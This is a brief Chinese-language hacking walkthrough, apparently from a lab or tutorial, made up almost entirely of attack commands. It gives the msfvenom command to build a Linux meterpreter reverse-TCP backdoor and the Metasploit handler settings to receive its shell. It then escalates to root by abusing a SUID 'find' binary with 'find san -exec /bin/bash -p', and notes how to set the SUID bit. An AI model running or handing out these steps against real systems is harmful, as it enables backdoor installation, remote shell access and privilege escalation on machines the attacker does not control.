生成msf后门,上传到目标机,开启监听,等待运行。
>msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=6666 -i 3 -f elf -o shell //生成后门
>set payload linux/x64/meterpreter/reverse_tcp >set lhost 0.0.0.0 >set lport 6666 >exploit2.上传信息收集脚本
上传信息收集脚本到目标机,运行结果可以看到带有suid的命令。
3.漏洞利用注:chmod u+s find 可以给find命令添加suid
通过信息收集,发现存在suid漏洞,利用带有suid的find命令进行提权。
touch san find san -exec whoami ;
find san -exec /bin/bash -p ;



